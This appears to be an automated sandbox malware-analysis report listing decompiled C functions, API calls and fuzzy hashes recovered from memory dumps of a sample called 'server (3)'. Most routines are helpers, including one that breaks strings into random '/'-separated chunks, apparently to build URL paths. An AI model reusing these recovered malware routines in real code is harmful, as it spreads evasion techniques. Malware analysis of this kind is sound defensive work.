          0x005e447f
          0x005e4516
          0x005e451d
          0x005e451d
          0x005e4488
          0x005e448f
          0x005e449f
          0x005e449f
          0x005e44a5
          0x005e44a7
          0x005e44ac
          0x005e44b5
          0x005e44bb
          0x005e44c0
          0x005e44cb
          0x005e44cf
          0x005e44d1
          0x005e44d2
          0x005e44db
          0x005e44df
          0x005e44f0
          0x005e44e1
          0x005e44e6
          0x005e44eb
          0x005e44fa
          0x005e44fa
          0x005e44cf
          0x005e4500
          0x005e4506
          0x005e4506
          0x005e450f
          0x005e4514
          0x005e4514
          0x00000000

          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: FreeSleepStringlstrlenmemcpy
          • String ID:
          • API String ID: 1198164300-0
          • Opcode ID: 61d44d4dcc048ecfd80d385b239005fcbdc964cf6c81ff0782676389147576bf
          • Instruction ID: 6bfa226c39f25a40d5914fed2e09a80d71888ad926554a83c92da2dba9faccbd
          • Opcode Fuzzy Hash: 61d44d4dcc048ecfd80d385b239005fcbdc964cf6c81ff0782676389147576bf
          • Instruction Fuzzy Hash: FA216075A0024AEFCB05DFA5D88899EBFB4FF88314B10816AE981D7310EB30DA04DF50
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E2708 Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
          Download Yara Rule
          C-Code - Quality: 68%
          			E005E2708(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x5ea2d8, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x5ea2f0; // 0x4c759564
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x5ea2f0 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















          0x005e2710
          0x005e2713
          0x005e2719
          0x005e2731
          0x005e2733
          0x005e2738
          0x005e273a
          0x005e273d
          0x005e273f
          0x005e2742
          0x005e2744
          0x005e2744
          0x005e2746
          0x005e2751
          0x005e2756
          0x005e2767
          0x005e276f
          0x005e2774
          0x005e2777
          0x005e277a
          0x005e277c
          0x005e277f
          0x005e2782
          0x005e2782
          0x005e2785
          0x005e2790
          0x005e2795
          0x005e279f

          APIs
          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,005E6708,00000000,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E2713
          • RtlAllocateHeap.NTDLL(00000000,?), ref: 005E272B
          • memcpy.NTDLL(00000000,02BC9600,-00000008,?,?,?,005E6708,00000000,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E276F
          • memcpy.NTDLL(00000001,02BC9600,00000001,005E3ECE,00000000,02BC9600), ref: 005E2790
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: memcpy$AllocateHeaplstrlen
          • String ID:
          • API String ID: 1819133394-0
          • Opcode ID: 8b15ab61c9b6137c9c8413d40299fae39ad072be2762521eebe561ba020c11af
          • Instruction ID: db214384094f23144d6c93467c05c198ada0a54cc90a9e1085ab8af511345864
          • Opcode Fuzzy Hash: 8b15ab61c9b6137c9c8413d40299fae39ad072be2762521eebe561ba020c11af
          • Instruction Fuzzy Hash: 10112376A00295ABC7188B6ACC88D9A7FAEEB90360B050166F584AB250E7709E0493A0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E7843 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E005E7843(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






          0x005e784d
          0x005e7851
          0x005e7866
          0x005e7868
          0x005e786d
          0x005e7873
          0x005e7875
          0x005e787a
          0x005e7885
          0x005e787c
          0x005e787c
          0x005e787c
          0x005e787a
          0x005e7893

          APIs
          • memset.NTDLL ref: 005E7851
          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,747581D0,00000000,00000000), ref: 005E7866
          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005E7873
          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,005E3F34,00000000,?), ref: 005E7885
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: CreateEvent$CloseHandlememset
          • String ID:
          • API String ID: 2812548120-0
          • Opcode ID: 0f5cc6eeffeaf15b6d5ee58128013c072003f4f48a3b55e6449b77ba509d7bd8
          • Instruction ID: edaeef65b91152c8fd4a0308f857e6da5c8719158f779194022a44ba7e51af9b
          • Opcode Fuzzy Hash: 0f5cc6eeffeaf15b6d5ee58128013c072003f4f48a3b55e6449b77ba509d7bd8
          • Instruction Fuzzy Hash: F1F054B110834C7FD3185F26DCC8C27BF9CFB95298B114D7EF18291511C671AC088A60
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005C1FCF Relevance: 6.0, APIs: 4, Instructions: 40COMMON
          Download Yara Rule
          APIs
          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,005C1C63), ref: 005C1FDE
          • GetVersion.KERNEL32(?,005C1C63), ref: 005C1FED
          • GetCurrentProcessId.KERNEL32(?,005C1C63), ref: 005C2009
          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,005C1C63), ref: 005C2022
          Memory Dump Source
          • Source File: 00000000.00000002.580647391.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5c0000_server_(3).jbxd
          Yara matches
          Similarity
          • API ID: Process$CreateCurrentEventOpenVersion
          • String ID:
          • API String ID: 845504543-0
          • Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
          • Instruction ID: 26d6ac30ba60a82db87eb8a3f85084285845ce19d672acb6c5f33ee932cdd053
          • Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
          • Instruction Fuzzy Hash: FFF03CB05813019FE7509FB8BE0DB553F64B795752F10413AE641FA1E4E7B08982CB5C
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E3230 Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E005E3230() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x5ea30c; // 0x1b4
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x5ea35c; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x5ea30c; // 0x1b4
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x5ea2d8; // 0x27d0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








          0x005e3230
          0x005e3237
          0x005e3281
          0x005e3283
          0x005e3283
          0x005e323b
          0x005e3241
          0x005e3246
          0x005e324a
          0x005e3250
          0x005e3257
          0x00000000
          0x00000000
          0x005e3259
          0x005e325e
          0x00000000
          0x00000000
          0x00000000
          0x005e325e
          0x005e3260
          0x005e3268
          0x005e326b
          0x005e326b
          0x005e3271
          0x005e3278
          0x005e327b
          0x005e327b
          0x00000000

          APIs
          • SetEvent.KERNEL32(000001B4,00000001,005E109A), ref: 005E323B
          • SleepEx.KERNEL32(00000064,00000001), ref: 005E324A
          • CloseHandle.KERNEL32(000001B4), ref: 005E326B
          • HeapDestroy.KERNEL32(027D0000), ref: 005E327B
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: CloseDestroyEventHandleHeapSleep
          • String ID:
          • API String ID: 4109453060-0
          • Opcode ID: 1f4acc4826d01aa264d3f23741b7115d6fd1d4caa9733805b2486a66088a056f
          • Instruction ID: fb5ac4ef0fd4e70848f0533f57d73e250540656604c5fd613d6da42f8ac02e72
          • Opcode Fuzzy Hash: 1f4acc4826d01aa264d3f23741b7115d6fd1d4caa9733805b2486a66088a056f
          • Instruction Fuzzy Hash: ADF03079A003D197DF1C9B769DCCA823FE8BB28761B040550FEC0EB2E1DB20E948B560
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E5157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50memorytimeCOMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E005E5157(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E005E6536(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0;
					_t22 = E005E330E(__ecx, _a4, _a8, _t25);
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E005E7767(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0x5ea2d8, 0, _t25);
				}
				return _t22;
			}










          0x005e5157
          0x005e5168
          0x005e516c
          0x005e51c7
          0x005e516e
          0x005e5175
          0x005e517d
          0x005e5185
          0x005e5189
          0x005e518f
          0x005e5197
          0x005e519a
          0x005e51b2
          0x005e51b2
          0x005e51bd
          0x005e51bd
          0x005e51ce

          APIs
            • Part of subcall function 005E6536: lstrlen.KERNEL32(?,00000000,02BC9E18,00000000,005E6F0A,02BCA03B,43175AC3,?,?,?,?,43175AC3,00000005,005EA00C,4D283A53,?), ref: 005E653D
            • Part of subcall function 005E6536: mbstowcs.NTDLL ref: 005E6566
            • Part of subcall function 005E6536: memset.NTDLL ref: 005E6578
          • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74715520,00000008,00000014,004F0053,02BC9270), ref: 005E518F
          • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74715520,00000008,00000014,004F0053,02BC9270), ref: 005E51BD
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
          • String ID: Uqt
          • API String ID: 1500278894-2320327147
          • Opcode ID: aa76b6749986b0f5c16afdf68eba047e3e44a08765ab1d69599b44edd34ee0c5
          • Instruction ID: a6e9885389238e9925772f0db43189d2add3fc5f12ad0737718b39dc4e4953b7
          • Opcode Fuzzy Hash: aa76b6749986b0f5c16afdf68eba047e3e44a08765ab1d69599b44edd34ee0c5
          • Instruction Fuzzy Hash: 5201D43220028ABBDF255FA6DC88F9A3F79FFC4714F400426FA809A161EA71D914D750
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E4332 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
          Download Yara Rule
          C-Code - Quality: 44%
          			E005E4332(void* __eax, char _a4) {

				 *0x5ea354 =  *0x5ea354 & 0x00000000;
				_push(0);
				_push(" XO");
				_push(1);
				_t1 =  &_a4; // 0x4d283a53
				_push( *_t1);
				 *0x5ea34c = 0xc;
				L005E5492();
				return __eax;
			}



          0x005e4332
          0x005e4339
          0x005e433b
          0x005e4340
          0x005e4342
          0x005e4342
          0x005e4346
          0x005e4350
          0x005e4355

          APIs
          • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(S:(M,00000001, XO,00000000), ref: 005E4350
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: DescriptorSecurity$ConvertString
          • String ID: XO$S:(M
          • API String ID: 3907675253-3814029343
          • Opcode ID: e0aeec08efd97b2a4275c775952b6e7e8f525444988525a3df4d6f57676d6734
          • Instruction ID: be1f510e5f9c44f3ff3d9e58b1f998109314f6a5b36a4a5cdb27c2a02f249115
          • Opcode Fuzzy Hash: e0aeec08efd97b2a4275c775952b6e7e8f525444988525a3df4d6f57676d6734
          • Instruction Fuzzy Hash: 66C04C751443C1AAE62C9B259C46F157B917768706F144808F2C0281D1C7F9705C9A1B
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E2058 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
          Download Yara Rule
          C-Code - Quality: 58%
          			E005E2058(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E005E33DC(_t2);
				if(_t34 != 0) {
					_t30 = E005E33DC(_t28);
					if(_t30 == 0) {
						E005E61DA(_t34);
					} else {
						_t39 = _a4;
						_t22 = E005E7AE9(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E005E7AE9(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














          0x005e2058
          0x005e2062
          0x005e2064
          0x005e206a
          0x005e206a
          0x005e2073
          0x005e2077
          0x005e2083
          0x005e2087
          0x005e20fb
          0x005e2089
          0x005e2089
          0x005e208d
          0x005e2092
          0x005e2097
          0x005e20b1
          0x005e20a0
          0x005e20a0
          0x005e20a4
          0x005e20a7
          0x005e20ac
          0x005e20ac
          0x005e20b6
          0x005e20de
          0x005e20e4
          0x005e20e7
          0x005e20b8
          0x005e20ba
          0x005e20c2
          0x005e20cd
          0x005e20d2
          0x005e20d2
          0x005e20ee
          0x005e20f5
          0x005e20f6
          0x005e20f6
          0x005e2087
          0x005e2106

          APIs
          • lstrlen.KERNEL32(00000000,00000008,?,74714D40,?,?,005E51F7,?,?,?,?,00000102,005E21E7,?,?,747581D0), ref: 005E2064
            • Part of subcall function 005E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,005E62F6), ref: 005E33E8
            • Part of subcall function 005E7AE9: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,005E2092,00000000,00000001,00000001,?,?,005E51F7,?,?,?,?,00000102), ref: 005E7AF7
            • Part of subcall function 005E7AE9: StrChrA.SHLWAPI(?,0000003F,?,?,005E51F7,?,?,?,?,00000102,005E21E7,?,?,747581D0,00000000), ref: 005E7B01
          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,005E51F7,?,?,?,?,00000102,005E21E7,?), ref: 005E20C2
          • lstrcpy.KERNEL32(00000000,00000000), ref: 005E20D2
          • lstrcpy.KERNEL32(00000000,00000000), ref: 005E20DE
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
          • String ID:
          • API String ID: 3767559652-0
          • Opcode ID: 4bf0eaeaed98ddebde5fcb758a6cbf7ce82019ef5420e927b0f3f1a5be899578
          • Instruction ID: fc83d20f824d7e92b692a7e01cb5e46dbda2ad5d6c4fe0e92a85255e32b5030b
          • Opcode Fuzzy Hash: 4bf0eaeaed98ddebde5fcb758a6cbf7ce82019ef5420e927b0f3f1a5be899578
          • Instruction Fuzzy Hash: C721F07210429AEBCB1A9F66CC8CA9E7FBDBF45390F148054F8859B202DA31DA40D7A1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E5DE4 Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E005E5DE4(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E005E33DC(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








          0x005e5df9
          0x005e5dfd
          0x005e5e07
          0x005e5e0c
          0x005e5e11
          0x005e5e13
          0x005e5e1b
          0x005e5e20
          0x005e5e2e
          0x005e5e33
          0x005e5e3d

          APIs
          • lstrlenW.KERNEL32(004F0053,?,74715520,00000008,02BC9270,?,005E52D0,004F0053,02BC9270,?,?,?,?,?,?,005E68B6), ref: 005E5DF4
          • lstrlenW.KERNEL32(005E52D0,?,005E52D0,004F0053,02BC9270,?,?,?,?,?,?,005E68B6), ref: 005E5DFB
            • Part of subcall function 005E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,005E62F6), ref: 005E33E8
          • memcpy.NTDLL(00000000,004F0053,747169A0,?,?,005E52D0,004F0053,02BC9270,?,?,?,?,?,?,005E68B6), ref: 005E5E1B
          • memcpy.NTDLL(747169A0,005E52D0,00000002,00000000,004F0053,747169A0,?,?,005E52D0,004F0053,02BC9270), ref: 005E5E2E
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: lstrlenmemcpy$AllocateHeap
          • String ID:
          • API String ID: 2411391700-0
          • Opcode ID: 5ea78fb5c9cf9f954604e2cda3710a1aff63dc556def0714e3b0c3b401a0194e
          • Instruction ID: b757f26b777bac9b6d839448e95c5899312624b82504ae3a5cc7e38abd0f4ae1
          • Opcode Fuzzy Hash: 5ea78fb5c9cf9f954604e2cda3710a1aff63dc556def0714e3b0c3b401a0194e
          • Instruction Fuzzy Hash: 7BF03772900519BB8F15AFA9CC89C8E7BADEF482587114062F94897202EA31EA149BA0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E7563 Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
          Download Yara Rule
          APIs
          • lstrlen.KERNEL32(02BC9C10,00000000,00000000,00000000,005E3EF9,00000000), ref: 005E7573
          • lstrlen.KERNEL32(?), ref: 005E757B
            • Part of subcall function 005E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,005E62F6), ref: 005E33E8
          • lstrcpy.KERNEL32(00000000,02BC9C10), ref: 005E758F
          • lstrcat.KERNEL32(00000000,?), ref: 005E759A
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
          • String ID:
          • API String ID: 74227042-0
          • Opcode ID: acb0f3129a59df5d8cca6deef40dd429f29bf848b284e961e900d55accb86a66
          • Instruction ID: bd2086f4776bce7bd3b10f54d3011e8722f1566d6ea2e5a56ce98612138964a1
          • Opcode Fuzzy Hash: acb0f3129a59df5d8cca6deef40dd429f29bf848b284e961e900d55accb86a66
          • Instruction Fuzzy Hash: 1FE092739016A5AB8715ABA9AC8CC5FBBADFF9D760304081AF640D7110D7319905DBA1
          Uniqueness

          Uniqueness Score: -1.00%